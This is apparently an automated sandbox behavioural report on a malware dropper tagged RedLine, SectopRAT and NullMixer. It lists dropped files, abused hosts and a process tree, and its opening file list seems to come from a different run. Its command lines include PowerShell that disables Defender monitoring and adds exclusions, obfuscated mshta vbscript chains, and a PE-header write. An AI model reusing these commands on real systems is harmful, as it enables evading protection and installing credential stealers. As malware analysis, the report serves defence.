C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19761b3b8d9d.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19761b3b8d9d.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19f51bcd77a.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19f51bcd77a.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue195c40958f528163.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue195c40958f528163.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>F3U_R.J"
C:\Windows\SysWOW64\msiexec.exe
msiexec -Y .\bENCc.E
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
Network
Files
\Users\Admin\AppData\Local\Temp\setup_installer.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe
\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\libcurlpp.dll
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\libgcc_s_dw2-1.dll
\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19411ac950924ec3f.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19c1338f41ab.exe
\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19150ee2be694c8a4.exe
\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19f51bcd77a.exe
\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19325eb008c0b950.exe
\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19c78ded4d176ac.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue1969586bcbf58493.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19761b3b8d9d.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19c06f159e0ec.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6V5UUU7WNQG6VILYJXP7.temp
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue195c40958f528163.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19879c4c0e.exe
\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue1993b3f72c.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue192762f1cd058ddf8.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue193858933525b62.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe
\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\libstdc++-6.dll
\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\libcurl.dll
\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\libwinpthread-1.dll
C:\Users\Admin\AppData\Local\Temp\is-CFL7R.tmp\Tue19879c4c0e.tmp
C:\Users\Admin\AppData\Local\Temp\is-CH67V.tmp\_isetup\_shfoldr.dll
C:\Users\Admin\AppData\Local\Temp\is-CH67V.tmp\idp.dll
C:\Users\Admin\AppData\Local\Temp\Cab6307.tmp
Analysis: behavioral10
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:28
Platform
win10v2004-20241007-en
Max time kernel
91s
Max time network
157s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0911cd5800a45.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-DNP96.tmp\Wed09a6fb1d0dd846.tmp | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-DNP96.tmp\Wed09a6fb1d0dd846.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-V5K5R.tmp\Wed09a6fb1d0dd846.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3780 set thread context of 4536 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09e3a07534aa.exe | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09e3a07534aa.exe |
| PID 1000 set thread context of 2916 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09f3b13c770637f.exe | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09f3b13c770637f.exe |
| PID 3012 set thread context of 2708 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09c36f786070b6.exe | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09c36f786070b6.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed096e68af113.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-DNP96.tmp\Wed09a6fb1d0dd846.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0937c2dc68a2496.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09c36f786070b6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09e3a07534aa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed094d15aaa9a48.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09f3b13c770637f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09a6fb1d0dd846.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09a6fb1d0dd846.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed096e68af113.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0911cd5800a45.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09e3a07534aa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0961d5d40c7b937c7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-V5K5R.tmp\Wed09a6fb1d0dd846.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed098e48a54663552b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09c36f786070b6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09f3b13c770637f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed096e68af113.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed096e68af113.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed096e68af113.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09a48dab921a3bda7.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed094d15aaa9a48.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe
"C:\Users\Admin\AppData\Local\Temp\1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe"
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09a48dab921a3bda7.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09e3a07534aa.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed094d15aaa9a48.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed096e68af113.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed098e48a54663552b.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09c36f786070b6.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0911cd5800a45.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09a6fb1d0dd846.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0961d5d40c7b937c7.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0937c2dc68a2496.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0988d1c2bd9a37.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09f3b13c770637f.exe
C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0988d1c2bd9a37.exe
Wed0988d1c2bd9a37.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 3516 -ip 3516
C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09e3a07534aa.exe
Wed09e3a07534aa.exe
C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed096e68af113.exe
Wed096e68af113.exe
C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09c36f786070b6.exe
Wed09c36f786070b6.exe
C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed094d15aaa9a48.exe
Wed094d15aaa9a48.exe
C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0911cd5800a45.exe
Wed0911cd5800a45.exe
C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed098e48a54663552b.exe
Wed098e48a54663552b.exe
C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09a6fb1d0dd846.exe
Wed09a6fb1d0dd846.exe
C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09f3b13c770637f.exe
Wed09f3b13c770637f.exe
C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0937c2dc68a2496.exe
Wed0937c2dc68a2496.exe
C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0961d5d40c7b937c7.exe
Wed0961d5d40c7b937c7.exe
C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09a48dab921a3bda7.exe
Wed09a48dab921a3bda7.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 540 -ip 540
C:\Users\Admin\AppData\Local\Temp\is-DNP96.tmp\Wed09a6fb1d0dd846.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DNP96.tmp\Wed09a6fb1d0dd846.tmp" /SL5="$80260,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09a6fb1d0dd846.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3516 -s 536
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 540 -s 356
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbscRIPT:cloSE( CREAteoBJeCT ( "WScript.SHELL" ). ruN("C:\Windows\system32\cmd.exe /C copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0911cd5800a45.exe"" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA &If """" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0911cd5800a45.exe"" ) do taskkill /f -IM ""%~nXN"" ", 0 , TRuE) )
C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09e3a07534aa.exe
C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09e3a07534aa.exe
C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09f3b13c770637f.exe
C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09f3b13c770637f.exe
C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09c36f786070b6.exe
C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09c36f786070b6.exe
C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09a6fb1d0dd846.exe
"C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09a6fb1d0dd846.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\is-V5K5R.tmp\Wed09a6fb1d0dd846.tmp
"C:\Users\Admin\AppData\Local\Temp\is-V5K5R.tmp\Wed09a6fb1d0dd846.tmp" /SL5="$80292,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09a6fb1d0dd846.exe" /SILENT
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0911cd5800a45.exe" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA&If ""== "" for %N IN ("C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0911cd5800a45.exe" ) do taskkill /f -IM "%~nXN"
C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE
..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbscRIPT:cloSE( CREAteoBJeCT ( "WScript.SHELL" ). ruN("C:\Windows\system32\cmd.exe /C copy /y ""C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE"" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA &If ""/PVbWtk2ZAwA"" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE"" ) do taskkill /f -IM ""%~nXN"" ", 0 , TRuE) )
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbscRIPT:cloSE( CREAteoBJeCT ( "WScript.SHELL" ). ruN("C:\Windows\system32\cmd.exe /C copy /y ""C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE"" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA &If ""/PVbWtk2ZAwA"" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE"" ) do taskkill /f -IM ""%~nXN"" ", 0 , TRuE) )
C:\Windows\SysWOW64\taskkill.exe
taskkill /f -IM "Wed0911cd5800a45.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA&If "/PVbWtk2ZAwA"== "" for %N IN ("C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE" ) do taskkill /f -IM "%~nXN"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA&If "/PVbWtk2ZAwA"== "" for %N IN ("C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE" ) do taskkill /f -IM "%~nXN"
C:\Windows\SysWOW64\mshta.exe
